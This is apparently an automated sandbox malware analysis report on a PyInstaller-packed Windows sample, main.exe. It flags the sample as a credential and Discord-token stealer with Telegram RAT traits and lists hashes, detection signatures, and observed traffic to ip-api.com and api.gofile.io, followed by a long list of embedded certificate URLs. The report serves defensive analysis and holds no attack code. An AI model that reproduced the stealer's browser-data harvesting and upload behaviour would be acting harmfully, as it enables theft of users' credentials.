Windows Analysis Report
main.exe

Overview

General Information

Sample name:	main.exe
Analysis ID:	1579350
MD5:	c0e4c8f676e781c9dd3d57ffa4f99111
SHA1:	94a6f60949f38da538b5227722698dd880961bb2
SHA256:	9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
Tags:	exeuser-JaffaCakes118
Infos:

Detection

Python Stealer, Discord Token Stealer, PRYSMAX STEALER

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Discord Token Stealer

Yara detected PRYSMAX STEALER

Yara detected Telegram RAT

Found pyInstaller with non standard icon

Tries to harvest and steal browser information (history, passwords, etc)

Yara detected Generic Python Stealer

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Usage Of Web Request Commands And Cmdlets

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: main.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: main.exe	ReversingLabs: Detection: 15%
Source: main.exe	Virustotal: Detection: 23%			Perma Link

Source: C:\Users\user\Desktop\main.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txt

Jump to behavior

Source: main.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733398840 FindFirstFileExW,FindClose,	0_2_00007FF733398840
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733397800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF733397800
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7333B2AE4

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 45.112.123.126 45.112.123.126

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /servers HTTP/1.1Accept-Encoding: identityHost: api.gofile.ioUser-Agent: Python-urllib/3.11Connection: close
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, br, zstdAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189?fields=192511 HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, br, zstdAccept: /Connection: keep-alive

Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: main.exe, 00000002.00000002.2026149433.000001E894D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/vcpython27
Source: main.exe, 00000002.00000002.2026149433.000001E894D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/vcpython27Pw
Source: main.exe, 00000002.00000003.2003283799.000001E893A4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025233362.000001E894ABD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005040977.000001E893A57000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981923054.000001E894ABA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894ABB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999790969.000001E893AD7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999164014.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2009804647.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986869706.000001E893C41000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981303330.000001E893A9B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997398066.000001E893A9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004470843.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796496956.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787561207.000001E893969000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979378962.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986060081.000001E893A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996080402.000001E8939A3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980653418.000001E893998000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787354247.000001E893A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577916/
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: main.exe, 00000002.00000002.2016672801.000001E893301000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988214568.000001E8945FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000314344.000001E893301000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979172811.000001E8945FA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972460986.000001E8945F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2009080620.000001E893301000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982186275.000001E893A5C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011637912.000001E893A60000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020289287.000001E893A60000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995854538.000001E893A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlO
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlHL
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0t
Source: main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: main.exe, 00000002.00000003.1979172811.000001E8945FA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972460986.000001E8945F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0b
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: main.exe, 00000002.00000003.2003283799.000001E893A4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005040977.000001E893A57000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982536657.000001E893A4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: main.exe, 00000002.00000002.2025233362.000001E894ABD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981923054.000001E894ABA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894ABB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025105777.000001E894A56000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980229397.000001E894A53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980318164.000001E894A46000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005241333.000001E894B14000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005844026.000001E894B17000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894AB6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025066924.000001E894A49000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 